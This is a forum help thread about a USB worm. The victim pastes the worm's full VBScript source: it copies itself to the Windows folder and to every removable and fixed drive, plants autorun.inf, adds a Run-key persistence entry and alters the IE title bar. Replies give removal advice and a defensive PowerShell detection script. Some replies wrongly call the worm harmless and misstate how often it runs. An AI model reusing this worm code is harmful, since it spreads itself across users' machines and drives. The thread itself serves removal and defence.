SOS... hacker attack? or Bluff ?

Status
Not open for further replies.

gsoul2soul

WOW... are you?
After using the PENDRIVE at my office... I get this weird thing at HOME!!!

(point to note: "I do check my pendrive with antivirus avast... and i update the virus definition daily")

And the virus software doesn't find anything on it!!!

Now... first of all my pendrive won't open when i double click... if i do it takes time and open in explorer (i can sense something has been started)

Then it's all fine and dandy... until i restart my PC (there's this weird TEXTfile that opens... on it there are some weird things written, more like language of some sort)

Then when i check my service... there is this one thing running "MFC32.DLL.VBS"
(which i can never... find, if i try to DELETE)... when i disable it by "msconfig" the notepad with that thing won't show!!

BUT......

When i open my IE browser on the TITLE bar it's written Hacked by GNUlihd@gmail.com

HELP.... i'm scared to even log into my email accounts, is anybody logging me? or is it a prank? help
 

gxsaurav

You have been GXified
just a script which changed a few things in registry

u need to open the pen drive, try command prompt. U need to check that VBS file, it is not a virus just a prank, or Avast have found a malicious code. That VB script just changed the registry for the IE titlebar text

another option is firefox, open firefox, & type <x>:\ in the address bar where x is the drive letter of your pen drive. then navigate to the file & read it.

From now on, just to be on safe side. Disable Autoplay for drives
 
gsoul2soul

WOW... are you?
well... it's something in my PENDRIVE !!! (Im sure... it's still there)

I tried doing like you said... even scanned my pendrive it won't say anything.

I click on my "i drive" that's my pendrive... and suddenly it opens in "Explorer"

and WALLA.... the message "Hacked by GNUlihd@gmail.com" appears on IE title bar

Now... how the F@#K am i to see this file in my pendrive? how ? how?
I'm using Avast antivirus... and i updated my virus definition before i scanned the pen drive!!!

HELP !!!
 

it_waaznt_me

Coming back to life ..
Start > Run > Cmd {Press Enter}
On the command prompt, type :
I: {Press Enter}

What do you see ?

Say the filename is MFC32.DLL.VBS

So the directory listing should be like :
I:\mfc32.dll.vbs

on the command prompt, type :
mkdir d:\safe

move mfc32.dll.vbs d:\safe\mfc.txt

The file should be moved to D drive with txt extension. You can now delete it safely.

[Edit] You may also use this guide. Provides step by step instructions on how to remove this particular virus.
 
gsoul2soul

WOW... are you?
Well... i easily deleted "MFC32.DLL.VBS" and "Autorun" (in my pendrive and my C drive) by simply enabling the "View System files" in Folder option.

Anyways... i did open the script file with "notepad" and here's the whole thing:

Is it something dangerous or just that "IE title bar thing?"

******************************

'A mod from nepal V0.04
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MFC32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MFC32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MFC32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MFC32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\MFC32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MFC32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MFC32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MFC32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by GNUlihd@gmail.com"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
 

it_waaznt_me

Coming back to life ..
Nothing dangerous, it's just changing the title bar of IE and checking and running the script file every hour.
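
A read-only check for the traces the script gsoul2soul posted leaves behind, plus the AutoRun setting recommended earlier in the thread (an added example, not part of any post). File names and registry values are taken from the quoted script and the first post; the `NoDriveTypeAutoRun` policy value is standard Windows but is not mentioned in the thread.

```powershell
# Read-only triage for the artefacts written by the script quoted in this thread.
# Nothing is deleted or changed; findings are collected and printed at the end.
$names    = 'MFC32DLL.dll.vbs', 'MFC32.DLL.VBS', 'autorun.inf'   # names from the thread
$findings = New-Object 'System.Collections.Generic.List[object]'
function Add-Finding($Where, $Detail) {
    $findings.Add([pscustomobject]@{ Where = $Where; Detail = $Detail })
}

# 1. Dropped copies: the Windows folder plus the root of every removable or fixed
#    drive (drive types 1 and 2 in the script's drive loop).
$roots  = @($env:windir)
$roots += [System.IO.DriveInfo]::GetDrives() |
    Where-Object { $_.IsReady -and $_.DriveType -in 'Removable', 'Fixed' } |
    ForEach-Object { $_.RootDirectory.FullName }

foreach ($root in $roots) {
    foreach ($n in $names) {
        # -Force is required: the script sets attributes 39 (read-only, hidden, system, archive).
        $item = Get-Item -LiteralPath (Join-Path $root $n) -Force -ErrorAction SilentlyContinue
        if (-not $item) { continue }
        if ($n -eq 'autorun.inf') {
            # Only flag an autorun.inf that starts the script host, as the quoted one does.
            $hit = Select-String -LiteralPath $item.FullName -Quiet `
                     -Pattern '^\s*(open|shellexecute)\s*=.*wscript\.exe'
            if (-not $hit) { continue }
        }
        Add-Finding $item.FullName "attributes: $($item.Attributes)"
    }
}

# 2. Registry values the script writes: the Run entry and the IE title bar text.
$run = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
$v   = (Get-ItemProperty -Path $run -Name 'MS32DLL' -ErrorAction SilentlyContinue).MS32DLL
if ($v) { Add-Finding "$run\MS32DLL" $v }

$ie = 'HKCU:\Software\Microsoft\Internet Explorer\Main'
$t  = (Get-ItemProperty -Path $ie -Name 'Window Title' -ErrorAction SilentlyContinue).'Window Title'
if ($t) { Add-Finding "$ie\Window Title" $t }

# 3. AutoRun policy: 0xFF disables AutoRun for every drive type.
$vals = foreach ($hive in 'HKLM:', 'HKCU:') {
    $pol = "$hive\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
    (Get-ItemProperty -Path $pol -Name 'NoDriveTypeAutoRun' -ErrorAction SilentlyContinue).NoDriveTypeAutoRun
}
if ($vals -notcontains 0xFF) {
    Add-Finding 'NoDriveTypeAutoRun' 'AutoRun is not disabled for all drive types in HKLM or HKCU'
}

$findings | Format-List
```

An empty result means none of the files or registry values were found and AutoRun is already disabled for all drive types.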
 

gtoX

Broken In
Anyways, it seems it's nothing harmful, just some kiddie working around with scripts to learn something. I found the fix for the problem in his/her (?) blog itself (*matrixalaya.blogspot.com/2007/04/hacked-by-gnulihd.html).


Have fun fixing the "virus" :)
 